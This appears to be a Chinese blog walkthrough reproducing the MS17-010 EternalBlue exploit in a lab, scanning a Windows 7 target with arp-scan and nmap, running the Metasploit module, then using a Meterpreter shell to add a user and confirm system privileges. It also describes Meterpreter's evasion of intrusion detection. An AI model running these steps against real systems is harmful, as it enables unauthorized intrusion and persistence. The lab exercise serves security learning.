永恒之蓝ms17-010漏洞复现

author author     2023-03-12     299

关键词:

MS17_010永恒之蓝漏洞复现

目录

前言

1.准备工作

2.漏洞利用步骤

前言

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络attack工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

1.准备工作

· 靶机:windows7 x64(NO SP)ip:192.168.83.130

· 渗透机:kali linux 2021 ip:192.168.83.134

· 工具:MSF模块 ,配合其他扫描工具

2.漏洞利用步骤

1.首先使用ARP扫描,发现主机

arp-scan -l

永恒之蓝MS17-010漏洞复现_永恒之蓝

或者使用netdiscover扫描

netdiscover -r 192.168.83.0/24

永恒之蓝MS17-010漏洞复现_MSF_02

这里我们可以看到靶机的ip地址为:192.168.83.130

2.使用NMAP进行漏洞扫描

nmap --script=vuln 192.168.83.130
可以看到扫出了MS17_010

永恒之蓝MS17-010漏洞复现_永恒之蓝_03

永恒之蓝MS17-010漏洞复现_MSF_04

3.利用MSF模块进行渗透

首先打开msf,在命令行中输入msfconsole

接下来输入search ms17_010

可以看到有四个模块,这里我们用第一个模块直接攻击,因为漏洞已经确认扫描出来了,所以后面的auxiliary辅助模块就可以跳过啦



输入show options,require项为yes的是必须要自己设置的

可以看到的是我们只需要设置RHOST也就是远程主机即靶机的IP

命令为set RHOST 192.168.83.130

设置好后输入run或者exploit执行攻击

跑完后我们可以看到已经拿下了靶机

永恒之蓝MS17-010漏洞复现_漏洞利用_05

永恒之蓝MS17-010漏洞复现_MSF_06


永恒之蓝MS17-010漏洞复现_命令行_07

永恒之蓝MS17-010漏洞复现_命令行_08

永恒之蓝MS17-010漏洞复现_命令行_09

永恒之蓝MS17-010漏洞复现_MSF_10

永恒之蓝MS17-010漏洞复现_命令行_11

这里科普一下什么是meterpreter

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

最后,Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。其中,攻击者与目标设备中Meterpreter的通信是通过Stager套接字实现的meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。

需要说明的meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令。 连上vpn又在内网中使用psexec和bind_tcp的时候经常会出现这种情况

输入shell则得到windows的命令行

这里我们首先查看用户列表

添加一个新用户

由于编码的问题。这里可以输入chcp 65001解决

用户bbb已经存在了 说明我们刚刚创建成功了

我们再看看我们权限如何,是否需要提权

说明我们已经是最高权限啦,接下来就可以干坏事了~

永恒之蓝MS17-010漏洞复现_命令行_12

永恒之蓝MS17-010漏洞复现_MSF_13

永恒之蓝MS17-010漏洞复现_命令行_14

永恒之蓝MS17-010漏洞复现_漏洞利用_15

永恒之蓝ms17-010漏洞复现

MS17_010永恒之蓝漏洞复现目录前言1.准备工作2.漏洞利用步骤前言永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络attack工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以... 查看详情

ms17-010(永恒之蓝)漏洞分析与复现(代码片段)

文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用... 查看详情

ms17-010(永恒之蓝)漏洞复现和分析(代码片段)

MS17-010(永恒之蓝)漏洞复现和分析一、漏洞简介1、永恒之蓝介绍:永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利... 查看详情

ms17010(永恒之蓝)漏洞复现(代码片段)

MS17010(永恒之蓝)漏洞利用与复现首先需要准备win7的环境做为靶机获取信息利用nmap扫描得到,靶机IPnmap-sP192.168.229.0/24得到:IP:192.168.229.169然后利用:nmap--script=vuln192.168.229.169得到靶机信息:发现可能利用的漏洞&... 查看详情

eternalblue永恒之蓝漏洞复现

EternalBlue漏洞复现1.   实训目的永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(ShadowBrokers)的神秘黑客组织于2017年4月14日公... 查看详情

ms17-010永恒之蓝漏洞利用

MS17-010永恒之蓝漏洞利用原理永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。SMB服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互... 查看详情

永恒之蓝ms17-010漏洞利用(代码片段)

前言永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒... 查看详情

永恒之蓝ms17-010漏洞利用(代码片段)

前言永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒... 查看详情

永恒之蓝漏洞利用复现

一、环境搭建:IP地址系统信息备注角色192.168.0.244win7旗舰版(未安装MS17-010补丁版本)需开启445端口及SMB协议靶机192.168.0.105win7旗舰版需安装python2.6.6&pywin32攻击机192.168.0.245kalilinux2.0生成reverseshell的dll文件辅助机二、攻击流程... 查看详情

关于nsa的eternalblue(永恒之蓝)ms17-010漏洞利用

    好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷的用,也可以,可是,... 查看详情

ms17-010永恒之蓝漏洞验证与利用

如何发现永恒之蓝?      利用漏洞之前,首先是要发现漏洞,那么我们在做测试的时候如何去发现漏洞呢?今天我给大家介绍一款开源免费的扫描工具Nessus。Nessus号称是世界上最流行的漏洞扫描程序,通常... 查看详情

永恒之蓝,17-010漏洞复现,实现远程桌面连接,超详细步骤,小白必看

1、你要找到自己要攻击的靶机的ip(win7或者win2008)2、进行nmap扫描(攻击机kali)我这里靶机是win7,可以看到445端口是开着的,那我们就可以开始攻击了 3、打开msfconsole,攻击模块 4、用search查找17-010 5、进入... 查看详情

ms17-010:利用“永恒之蓝”攻陷一台计算机

...Brokers决定公开一部分有价值的工具,其中“eternalblue”(永恒之蓝)就是其中之一(漏洞编号ms17-010)。那么永恒之蓝这个漏洞利用程序究竟牛X到什么地步呢?这么说吧,除了windows10以外,windows系列的系统无一能够幸免。于是... 查看详情

ms17-010永恒之蓝验证

一、安装MSF,windows下安装也可以,直接安装kali也可以,我是kali是攻击主机,win7是靶机,都在虚拟机里。1、windows下安装MSF请参考:http://blog.csdn.net/wangsy0202/article/details/51914748(https://www.metasploit.com/官网下载)2、kali的安装请直... 查看详情

关于永恒之蓝漏洞的补丁跟踪及实施记录

前言:利用MS17-010漏洞进行攻击的蠕虫病毒已经成了自上周末到现在的主要任务,当组织里面有大量的机器时,要在短时间内完成大量业务系统的防护和更新需要耗费大量的人力和资源。当然如果手段和方式得力,事情相对会顺... 查看详情

永恒之蓝ms17-010漏洞利用(代码片段)

前言永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒... 查看详情

永恒之蓝漏洞补丁-ms17010补丁列表kb号

MS17010补丁列表不同版本的操作系统对应的MS17-010补丁编号如下winxp特别补丁KB4012598winxp332位SecurityUpdateforWindowsXPSP3(KB4012598)winxp264位SecurityUpdateforWindowsXPSP2forx64-basedSystems(KB4012598)win2003特别补丁KB40125982003SP23 查看详情

"永恒之蓝"勒索软件病毒防范方法及措施

目前微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,请广大师生尽快根据各自操作系统安装补丁,地址:https://technet.microsoft.com/zh-cn/library/security/MS17-010;对于XP、2003等微软已不再提供安全更新的机器,推荐使用360“... 查看详情